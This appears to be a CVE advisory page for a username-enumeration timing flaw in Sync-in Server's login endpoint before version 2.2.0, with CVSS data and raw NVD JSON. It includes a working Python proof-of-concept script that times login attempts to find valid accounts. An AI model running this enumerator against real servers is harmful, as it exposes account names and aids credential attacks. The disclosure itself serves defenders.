Security Vulnerability Report
CVE-2026-41161 CVSS 5.3 MEDIUM

CVE-2026-41161

Published: 2026-05-08 14:16:33
Last Modified: 2026-05-12 15:00:34

Description

Sync-in Server is a secure, open-source platform for file storage, sharing, collaboration, and syncing. Prior to version 2.2.0, the /api/auth/login endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application's response time. This issue has been patched in version 2.2.0.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:sync-in:sync-in_server:*:*:*:*:*:*:*:* - VULNERABLE
Sync-in Server < 2.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only. Because this is a timing side channel (CWE-208), any fixed threshold is only meaningful relative to the link's own latency: calibrate against a username that cannot exist, take several samples per candidate, and treat a transport error as "unknown", not as "user does not exist".
python
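"""PoC for CVE-2026-41161: username enumeration via login response time.

Sync-in Server < 2.2.0 answers /api/auth/login measurably slower for an
existing username than for an unknown one (CWE-208, observable timing
discrepancy). Nothing in the response body is needed; only the round-trip
time is measured.

The original PoC compared a single wall-clock sample against a fixed 200 ms
threshold, which misclassifies on any link slower than that, and it reported
a transport error as "Not Found". This version measures a baseline against a
username that cannot exist, uses the median of several samples, and keeps
errors distinct from a negative result.

For security research and authorized testing only.
"""
import secrets
import statistics
import time

import requests

LOGIN_PATH = "/api/auth/login"
# Any fixed wrong password will do: the leak is in how long the server takes
# to reject the attempt, not in the reply itself.
DUMMY_PASSWORD = "dummy_password"


def _time_login(url, username, *, timeout):
    """POST one login attempt for *username* and return the elapsed seconds.

    Raises requests.RequestException on a transport failure. An HTTP error
    status is not a failure here: a 401 is the expected reply either way.
    """
    payload = {"username": username, "password": DUMMY_PASSWORD}
    headers = {"Content-Type": "application/json"}
    target = f"{url}{LOGIN_PATH}"
    # perf_counter is monotonic; time.time() can jump under clock adjustments.
    start = time.perf_counter()
    requests.post(target, json=payload, headers=headers, timeout=timeout)
    return time.perf_counter() - start


def check_username(url, username, *, samples=3, threshold=0.2, baseline=0.0, timeout=5):
    """Probe whether *username* exists by timing the login endpoint.

    Args:
        url: Base URL of the Sync-in server, e.g. ``http://host:8080``.
        username: Candidate username to test.
        samples: Login attempts to time; the median is used so that a single
            slow request does not decide the outcome.
        threshold: Seconds above *baseline* that count as "user exists".
            Tune it per target: it should sit well above the link's jitter
            and below the gap you measure on a known-good account.
        baseline: Median response time for a non-existent username (see
            ``measure_baseline``). The default 0.0 reproduces the original
            absolute-threshold behaviour, which is only meaningful on links
            with negligible latency.
        timeout: Per-request timeout in seconds.

    Returns:
        ``(True, median)`` if the user appears to exist, ``(False, median)``
        if not, and ``(None, 0.0)`` if no request completed. Callers must
        test for ``None`` explicitly: an error is not evidence of absence.
    """
    timings = []
    for _ in range(max(samples, 1)):
        try:
            timings.append(_time_login(url, username, timeout=timeout))
        except requests.RequestException as exc:
            print(f"Error: {exc}")
    if not timings:
        return None, 0.0
    median = statistics.median(timings)
    return median > baseline + threshold, median


def measure_baseline(url, *, samples=5, timeout=5):
    """Return the median login time for a username that cannot exist.

    This captures the "unknown user" code path on the target so candidates
    can be compared against it instead of against an absolute number.

    Returns None if every sample failed with a transport error.
    """
    # Random suffix so the probe cannot collide with a real account.
    nonexistent = "nx-" + secrets.token_hex(8)
    exists, median = check_username(url, nonexistent, samples=samples, timeout=timeout)
    return None if exists is None else median


if __name__ == "__main__":
    target_url = "http://example.com"
    user_list = ["admin", "root", "test", "guest"]

    baseline = measure_baseline(target_url)
    if baseline is None:
        raise SystemExit("could not reach the login endpoint; aborting")
    print(f"[*] Baseline (unknown user): {baseline:.4f}s")

    for user in user_list:
        exists, duration = check_username(target_url, user, baseline=baseline)
        if exists is None:
            # Distinguish "could not test" from "does not exist".
            print(f"[?] Error probing {user}; result unknown")
        elif exists:
            print(f"[+] Found User: {user} (Response: {duration:.4f}s)")
        else:
            print(f"[-] Not Found: {user} (Response: {duration:.4f}s)")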

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-41161", "sourceIdentifier": "[email protected]", "published": "2026-05-08T14:16:33.093", "lastModified": "2026-05-12T15:00:33.713", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Sync-in Server is a secure, open-source platform for file storage, sharing, collaboration, and syncing. Prior to version 2.2.0, the /api/auth/login endpoint contains a logic flaw that allows unauthenticated remote attackers to enumerate valid usernames by measuring the application's response time. This issue has been patched in version 2.2.0."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": 
"NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-208"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:sync-in:sync-in_server:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.2.0", "matchCriteriaId": "B5BFE291-F06A-4192-AE04-F5366BB3288C"}]}]}], "references": [{"url": "https://github.com/Sync-in/server/releases/tag/v2.2.0", "source": "[email protected]", "tags": ["Patch", "Product"]}, {"url": "https://github.com/Sync-in/server/security/advisories/GHSA-43fj-qp3h-hrh5", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://github.com/Sync-in/server/security/advisories/GHSA-43fj-qp3h-hrh5", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Vendor Advisory"]}]}}